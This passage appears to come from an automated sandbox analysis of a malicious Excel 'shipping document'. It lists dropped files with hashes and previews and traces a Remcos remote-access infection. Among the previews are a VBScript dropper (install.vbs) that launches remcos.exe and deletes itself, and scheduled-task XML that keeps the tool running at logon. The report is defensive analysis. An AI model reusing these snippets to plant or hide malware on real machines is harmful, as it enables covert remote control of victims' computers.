                                                                      SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                                      MD5:E4F1E21910443409E81E5B55DC8DE774
                                                                      SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                                      SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                                      SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                                      Malicious:false
                                                                      Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):326
                                                                      Entropy (8bit):3.107585226592965
                                                                      Encrypted:false
                                                                      SSDEEP:6:kKd0MSwwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:GWkPlE99SNxAhUegeT2
                                                                      MD5:89AD6E148F32A00FEDC7288A635BF581
                                                                      SHA1:D1DE2367BE129CADD6BD1A2BA6D986ECE49F881E
                                                                      SHA-256:6D362B48AFD6CDC3CF0E6F5CF4ACA012E0C304A493D9CDECA7821477BA706670
                                                                      SHA-512:EBA4C7738635A87395F369F50F78B32BB27020D2184778940599CC64A4972D72A35DC362F75836DD399C065A295BFF0084D79139FBA5D66F051EA5D647214D48
                                                                      Malicious:false
                                                                      Preview: p...... ........Z.t.C...(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...
                                                                      C:\Users\user\AppData\Local\Temp\2CFE0000
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):376797
                                                                      Entropy (8bit):7.991311231762346
                                                                      Encrypted:true
                                                                      SSDEEP:6144:ne+RqqVOMhdv2WY8hNduZYoFzFN0/5DC5GFvVxUX9eCnlAynPyEYT4c9r33iap:n9tOMzOH8ZoFzUOcFvwX9eepPZm4c9TN
                                                                      MD5:442B8C31C01CD099A86D738D8D616141
                                                                      SHA1:BCE32B3724A3E1766AD3592B67B9280D26BFEA26
                                                                      SHA-256:BF0BB5BC75AB3EF31A297C69FDB59AEC5865D813B2E49608FC4E315C1AB16103
                                                                      SHA-512:65500A0D75840FCAE4357E9FD5F6A6FB861CB13570C1612B605366B0AA278EEEC663BDD89147DE23442C21FABBD039A91E0C07C4BDD1021B2EAAA4A9902319E3
                                                                      Malicious:false
                                                                      Preview: ...N.0...H.C.+J\8 ..r.e......=M...<..g...U...DI..~..xfz...x....]V.V..^i.....Oy..L.)a.........l.....U;.Y.R...e.V`..8ZY.hE.... .R4..&.k..K.R....M..B..T.....\;V..|.Q5.!.-E"....H...-Ay.jI...A(l..5U.....R..!.{..5;Lm...~.E..;%#6..*....xAa. ..9.u....VP<....Ki...>.../.a.....V.L.%VY!..wbn..v......R..n/O../..\.XO;...L.......D..xw=f...:.. ...<".a......[.A=%j.....=.CE.-....s..4U...H.+.....|....AL..]....D.'..wf!.@.a.n..>.......PK..........!....-............[Content_Types].xml ...(...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      C:\Users\user\AppData\Local\Temp\Cab5735.tmp
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                                      Category:dropped
                                                                      Size (bytes):58936
                                                                      Entropy (8bit):7.994797855729196
                                                                      Encrypted:true
                                                                      SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                                      MD5:E4F1E21910443409E81E5B55DC8DE774
                                                                      SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                                      SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                                      SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                                      Malicious:false
                                                                      Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                                                      C:\Users\user\AppData\Local\Temp\Tar5736.tmp
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):152533
                                                                      Entropy (8bit):6.31602258454967
                                                                      Encrypted:false
                                                                      SSDEEP:1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
                                                                      MD5:D0682A3C344DFC62FB18D5A539F81F61
                                                                      SHA1:09D3E9B899785DA377DF2518C6175D70CCF9DA33
                                                                      SHA-256:4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
                                                                      SHA-512:0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
                                                                      Malicious:false
                                                                      Preview: 0..S...*.H.........S.0..S....1.0...`.H.e......0..C...+.....7.....C.0..C.0...+.....7.............201012214904Z0...+......0..C.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                      C:\Users\user\AppData\Local\Temp\install.vbs
                                                                      Process:C:\Users\user\AppData\Local\Temp\sm.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):418
                                                                      Entropy (8bit):3.480963687157218
                                                                      Encrypted:false
                                                                      SSDEEP:12:4D8o++ugypjBQMBvFQ4lOQ1MJhpE2F0M/0aimi:4Dh+S0FNOQqBE2F0Nait
                                                                      MD5:F6BF3BB1299A9BDA49FED7D26E2E9906
                                                                      SHA1:065B285FC471F5DB66AAE967016DAA022C1142F4
                                                                      SHA-256:2976F3C42F546776DBC6D8F32767C30B6C71199981E2F63E46C3812C0FEB37CA
                                                                      SHA-512:A5AE404B72F7C5B1BB1961CCBB419CB31F16472D7B9728BDC2E9FCA4E31B2BEE62B224A5944ECCA04DD8A423C3B6A62F209455BF1B0E582F41A56CA23BE32BC4
                                                                      Malicious:false
                                                                      Preview: W.S.c.r.i.p.t...S.l.e.e.p. .1.0.0.0...S.e.t. .f.s.o. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".S.c.r.i.p.t.i.n.g...F.i.l.e.S.y.s.t.e.m.O.b.j.e.c.t.".)...C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...R.u.n. .".c.m.d. ./.c. .".".C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.R.e.m.c.o.s.\.r.e.m.c.o.s...e.x.e.".".".,. .0...f.s.o...D.e.l.e.t.e.F.i.l.e.(.W.s.c.r.i.p.t...S.c.r.i.p.t.F.u.l.l.N.a.m.e.).
                                                                      C:\Users\user\AppData\Local\Temp\tmp362D.tmp
                                                                      Process:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1623
                                                                      Entropy (8bit):5.159516854402537
                                                                      Encrypted:false
                                                                      SSDEEP:24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBKShtn:cbhZ7ClNQi/rydbz9I3YODOLNdq3cSz
                                                                      MD5:6BB09DA9B9954D91560A18EADB09ACCE
                                                                      SHA1:42A48847575D82331A5EAF972DFCDECAAD3E899B
                                                                      SHA-256:36334DE1D4562CDCAAC330EAEDF074A187AED5631DEBFB78726A9E50B8264214
                                                                      SHA-512:FF379E5DCC928D4E6D7B07C7924B65639DDBA2B15315C5E479026A8E0C2E790C1E3984670E686AB193CC831D74C1B92B2153D8FD7A9CCF3947F58DC594D20288
                                                                      Malicious:false
                                                                      Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>
                                                                      C:\Users\user\AppData\Local\Temp\tmp915.tmp
                                                                      Process:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1623
                                                                      Entropy (8bit):5.159516854402537
                                                                      Encrypted:false
                                                                      SSDEEP:24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBKShtn:cbhZ7ClNQi/rydbz9I3YODOLNdq3cSz
                                                                      MD5:6BB09DA9B9954D91560A18EADB09ACCE
                                                                      SHA1:42A48847575D82331A5EAF972DFCDECAAD3E899B
                                                                      SHA-256:36334DE1D4562CDCAAC330EAEDF074A187AED5631DEBFB78726A9E50B8264214
                                                                      SHA-512:FF379E5DCC928D4E6D7B07C7924B65639DDBA2B15315C5E479026A8E0C2E790C1E3984670E686AB193CC831D74C1B92B2153D8FD7A9CCF3947F58DC594D20288
                                                                      Malicious:false
                                                                      Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>
                                                                      C:\Users\user\AppData\Local\Temp\tmpC5CF.tmp
                                                                      Process:C:\Users\user\AppData\Local\Temp\sm.exe
                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1623
                                                                      Entropy (8bit):5.159516854402537
                                                                      Encrypted:false
                                                                      SSDEEP:24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBKShtn:cbhZ7ClNQi/rydbz9I3YODOLNdq3cSz
                                                                      MD5:6BB09DA9B9954D91560A18EADB09ACCE
                                                                      SHA1:42A48847575D82331A5EAF972DFCDECAAD3E899B
                                                                      SHA-256:36334DE1D4562CDCAAC330EAEDF074A187AED5631DEBFB78726A9E50B8264214
                                                                      SHA-512:FF379E5DCC928D4E6D7B07C7924B65639DDBA2B15315C5E479026A8E0C2E790C1E3984670E686AB193CC831D74C1B92B2153D8FD7A9CCF3947F58DC594D20288
                                                                      Malicious:true
                                                                      Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>
                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Jan 6 14:45:50 2021, atime=Wed Jan 6 14:45:50 2021, length=8192, window=hide
                                                                      Category:dropped
                                                                      Size (bytes):867
                                                                      Entropy (8bit):4.473956273754622
                                                                      Encrypted:false
                                                                      SSDEEP:12:85QO7tCLgXg/XAlCPCHaXEKB8VXB/gUaX+WnicvbG+bDtZ3YilMMEpxRljKbTdJU:85h7tU/XT0K6VXWhYevDv3qKrNru/
                                                                      MD5:5A186F2F871702973006F88C51419168
                                                                      SHA1:004248FA92673AE0071D8C68CD42D41BE89A1791
                                                                      SHA-256:D0C4313F72D044F754441610BBB109F0BD5BF6EF94D1376A37214DB2D48C47B1
                                                                      SHA-512:1E564FC709B73DA9CB90378846B71E37D288E58E7F15AA0B381B6FEAF51CF121C56E0E5428601499A2FDC75984DF6A05588126715B0087E4E4C72365857348A7
                                                                      Malicious:false
                                                                      Preview: L..................F...........7G..p...C...p...C.... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....&R.}..Desktop.d......QK.X&R.}*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\216041\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......216041..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Shipping Document PLBL003534.LNK
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:19 2020, mtime=Wed Jan 6 14:45:50 2021, atime=Wed Jan 6 14:45:50 2021, length=401920, window=hide
                                                                      Category:dropped
                                                                      Size (bytes):2208
                                                                      Entropy (8bit):4.577698022185074
                                                                      Encrypted:false
                                                                      SSDEEP:48:8a/XT0ZVXb491S/KQh2a/XT0ZVXb491S/KQ/:8a/XuVXb49c/KQh2a/XuVXb49c/KQ/
                                                                      MD5:F70C3EC3FD1C15F9C33B923AF691FCA1
                                                                      SHA1:9361F8EF8BF3F50485132D2B7A396E385C17771D
                                                                      SHA-256:A79182F7CBEDEB9D5F79BD3F233F821BC4867D2CB51AD32FAD0DB53B95A95BAD
                                                                      SHA-512:D87A9CB08F3AE00E13A411FCE4220D5EDA764DC4ADD0D569180947BC3184BCAD23CDEEB4D587CDC7629496A7354C60B13AAAC7E7893F0E81CB007513383FE35E
                                                                      Malicious:false
                                                                      Preview: L..................F.... .....R..{..p...C....}..C...."...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.."..&R.} .SHIPPI~1.XLS..n.......Q.y.Q.y*...8.....................S.h.i.p.p.i.n.g. .D.o.c.u.m.e.n.t. .P.L.B.L.0.0.3.5.3.4...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\216041\Users.user\Desktop\Shipping Document PLBL003534.xls.7.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.h.i.p.p.i.n.g. .D.o.c.u.m.e.n.t. .P.L.B.L.0.0.3.5.3.4...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.........
                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):137
                                                                      Entropy (8bit):4.8830506311217645
                                                                      Encrypted:false
                                                                      SSDEEP:3:oyBVomMM2F3ClRpw64ouj2F3ClRpw64omMM2F3ClRpw64ov:dj6Mrrw9rrw6Mrrwy
                                                                      MD5:7EFD59FD92423426797351817322EA44
                                                                      SHA1:BA325691660E7CE3829BB1391495C749B900E391
                                                                      SHA-256:E07177B3DFBED767D9EF64208C479D088ACCC1BB0AE83998FB5F217B9DC765CF
                                                                      SHA-512:FA026314536D2BBAD7FA81ABC7F69EB99958246B39B71332E3FF941611C1A26823CFE453C6C7CCB38739660AE4E7A1A22E25DDC78BF18A72313A289C8DF99236
                                                                      Malicious:false
                                                                      Preview: Desktop.LNK=0..[xls]..Shipping Document PLBL003534.LNK=0..Shipping Document PLBL003534.LNK=0..[xls]..Shipping Document PLBL003534.LNK=0..
                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BZONVEL56FNYZL2PBVU0.temp
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):8016
                                                                      Entropy (8bit):3.586853503054533
                                                                      Encrypted:false
                                                                      SSDEEP:96:chQCsMqmqvsqvJCwokz8hQCsMqmqvsEHyqvJCworqzUkDYjHPf8/kilUVuIu:cy7okz8yvHnorqzZ+f88AIu
                                                                      MD5:5A1B6FFDCFCDB3DE498E0E1EA2A0D0AB
                                                                      SHA1:81E308A28AAEED43667C8C82AEBB48021AD6E055
                                                                      SHA-256:D626EF1B89099C19723EB8C48402C3E45D92B0AA0698ADF8393360A72D4E4FB0
                                                                      SHA-512:0EE10776126CDA5DB0313E075B673F67E426BE0190CB34A917817F7221930A46E06999546C155780A084584461718BDE96841B567FA99EE40C08E7AA2210C6B1
                                                                      Malicious:false
                                                                      Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JSZC9B2E50C9M18633UK.temp
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):8016
                                                                      Entropy (8bit):3.586853503054533
                                                                      Encrypted:false
                                                                      SSDEEP:96:chQCsMqmqvsqvJCwokz8hQCsMqmqvsEHyqvJCworqzUkDYjHPf8/kilUVuIu:cy7okz8yvHnorqzZ+f88AIu
                                                                      MD5:5A1B6FFDCFCDB3DE498E0E1EA2A0D0AB
                                                                      SHA1:81E308A28AAEED43667C8C82AEBB48021AD6E055
                                                                      SHA-256:D626EF1B89099C19723EB8C48402C3E45D92B0AA0698ADF8393360A72D4E4FB0
                                                                      SHA-512:0EE10776126CDA5DB0313E075B673F67E426BE0190CB34A917817F7221930A46E06999546C155780A084584461718BDE96841B567FA99EE40C08E7AA2210C6B1
                                                                      Malicious:false
                                                                      Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\X7WLGBRLWC33P8TMDREG.temp
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):8016
                                                                      Entropy (8bit):3.586853503054533
                                                                      Encrypted:false
                                                                      SSDEEP:96:chQCsMqmqvsqvJCwokz8hQCsMqmqvsEHyqvJCworqzUkDYjHPf8/kilUVuIu:cy7okz8yvHnorqzZ+f88AIu
                                                                      MD5:5A1B6FFDCFCDB3DE498E0E1EA2A0D0AB
                                                                      SHA1:81E308A28AAEED43667C8C82AEBB48021AD6E055
                                                                      SHA-256:D626EF1B89099C19723EB8C48402C3E45D92B0AA0698ADF8393360A72D4E4FB0
                                                                      SHA-512:0EE10776126CDA5DB0313E075B673F67E426BE0190CB34A917817F7221930A46E06999546C155780A084584461718BDE96841B567FA99EE40C08E7AA2210C6B1
                                                                      Malicious:false
                                                                      Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                      C:\Users\user\AppData\Roaming\Remcos\logs.dat
                                                                      Process:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):85
                                                                      Entropy (8bit):4.7501813069965415
                                                                      Encrypted:false
                                                                      SSDEEP:3:ttUZFOJKrA4RXMRPHv33a1oy1aeo:tmK4XqdHv3qNIP
                                                                      MD5:6F990A2A0A10413C9997EA2F579DD420
                                                                      SHA1:85215BFD01BBA2E6EA1EA6762B46261A10F875A7
